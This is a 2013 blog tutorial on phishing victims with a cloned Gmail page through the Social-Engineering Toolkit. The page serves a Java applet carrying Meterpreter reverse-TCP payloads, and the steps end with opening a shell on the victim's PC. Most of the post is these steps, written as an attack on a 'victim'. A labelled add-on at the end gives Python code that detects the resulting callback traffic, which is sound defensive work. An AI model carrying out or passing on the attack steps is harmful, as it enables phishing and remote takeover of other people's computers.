Tuesday, September 3, 2013

Bypassing Antivirus using Multi Pyinjector Shell Code Injection

IN THIS TUTORIAL I HAVE HACKED MY OWN WINDOWS 8 PC..

WORKING PLATFORM : WINDOWS, LINUX, MAC

PREREQUISITE : JAVA INSTALLED ON THE VICTIM'S PC.

OPEN SET TOOLKIT:

APPLICATION > KALI LINUX > EXPLOITATION TOOLS > SOCIAL ENGINEERING TOOLKIT > SE-TOOLKIT



AFTER OPENING SET U SEE THIS.


LET'S CHOOSE NO "1" => SOCIAL-ENGINEERING ATTACKS


LET'S CHOOSE NO 2 => WEBSITE ATTACK VECTORS


SELECT OPTION 1 => JAVA APPLET ATTACK METHOD


LET'S CHOOSE OPTION 2 => SITE CLONER


SET NAT/PORT FORWARDING TO => "NO"


ENTER UR "IP-ADDRESS" HERE FOR THE REVERSE CONNECTION


ENTER THE SITE WHICH U WANNA CLONE 
I AM USING GMAIL...


AFTER THAT THE TASK IS TO CHOOSE THE PAYLOAD. JUST ENTER NO 16 => MULTIPYINJECTOR SHELLCODE INJECTION


CHOOSE 1 => WINDOWS METERPRETER REVERSE TCP
CHOOSE PORT => 444 U CAN USE ANY PORT.


I AM CHOOSING TWO MORE PORTS SO THE HACKING SESSION IS MORE POWERFUL..
I AM USING 444 AND 445 AS TWO MORE PORTS HERE.


NOW SELECT THE OPTION 6 => I'M FINISHED ADDING PAYLOAD.


YOU CAN SEE SOMETHING LIKE THIS.
IT IS STARTING THE PAYLOAD HANDLER AND WAITING FOR THE VICTIM'S REPLY.




GIVE UR VICTIM UR IP ADDRESS. MINE IS "192.168.152.132".
WHEN THE VICTIM PUTS UR IP IN THEIR BROWSER, HE/SHE GETS A JAVA POP-UP.
WHEN HE/SHE RUNS THIS APPLET, THE MACHINE IS HACKED.


NOW THE VICTIM HAS RUN UR APPLET ON HIS PC, SO U GET SOMETHING LIKE THIS.


AFTER THAT, ENTER A COMMAND TO LIST THE SESSIONS U HAVE GOT FROM THE VICTIM'S PC.

COMMAND :  sessions -l 


CHOOSE ANY SESSION FROM THE LIST USING THIS COMMAND =>  sessions -i ID

TYPE =>  shell

TO GET THE SYSTEM..          
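
FROM THE DEFENDER'S SIDE, THE STEPS ABOVE LEAVE A NETWORK PATTERN: A BROWSER VISIT TO A BARE IP, THEN OUTBOUND CONNECTIONS FROM THE SAME PC TO THAT SAME IP ON SEVERAL OTHER PORTS. THE PYTHON BELOW IS AN ADDED EXAMPLE, NOT PART OF THE ORIGINAL POST OR OF SET, THAT FLAGS THIS PATTERN. THE FLOW-RECORD FORMAT, THE VICTIM ADDRESSES, THE 5 MINUTE WINDOW AND THE WEB PORTS 80/443 ARE ASSUMPTIONS.

```python
from collections import defaultdict
from datetime import datetime, timedelta

WEB_PORTS = {80, 443}            # assumption: the cloned page is served on a web port
WINDOW = timedelta(minutes=5)    # assumption: callbacks follow the page visit quickly
MIN_PORTS = 2                    # the post configures several payload ports

# Constructed sample flow records: "timestamp src_ip dst_ip dst_port".
# Only 192.168.152.132 and ports 444/445 come from the post.
SAMPLE_FLOWS = """\
2013-09-03T10:00:01 192.168.152.140 192.168.152.132 80
2013-09-03T10:00:40 192.168.152.140 192.168.152.132 444
2013-09-03T10:00:41 192.168.152.140 192.168.152.132 445
2013-09-03T10:01:00 192.168.152.141 192.168.152.10 80
2013-09-03T10:01:05 192.168.152.141 192.168.152.10 443
2013-09-03T10:02:00 192.168.152.142 192.168.152.132 80
2013-09-03T11:30:00 192.168.152.142 192.168.152.132 444
"""

def parse_flows(text):
    """Parse flow lines into (time, src, dst, port) tuples, oldest first."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[3].isdigit():
            continue  # skip malformed records
        ts, src, dst, port = parts
        flows.append((datetime.fromisoformat(ts), src, dst, int(port)))
    return sorted(flows)

def find_callbacks(flows, window=WINDOW, min_ports=MIN_PORTS):
    """Return {(src, dst): [ports]} where src visited dst over the web and then
    connected to dst on >= min_ports distinct non-web ports inside the window."""
    web_visits = defaultdict(list)  # (src, dst) -> times of web visits
    callbacks = defaultdict(set)    # (src, dst) -> non-web ports seen afterwards
    for ts, src, dst, port in flows:
        key = (src, dst)
        if port in WEB_PORTS:
            web_visits[key].append(ts)
        elif any(timedelta(0) <= ts - seen <= window for seen in web_visits[key]):
            # Port 445 alone is ordinary SMB traffic; it only counts here
            # because it follows a web visit to the same address.
            callbacks[key].add(port)
    return {k: sorted(p) for k, p in callbacks.items() if len(p) >= min_ports}

if __name__ == "__main__":
    for (src, dst), ports in find_callbacks(parse_flows(SAMPLE_FLOWS)).items():
        print(f"ALERT {src} -> {dst} callback ports {ports}")
```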
            
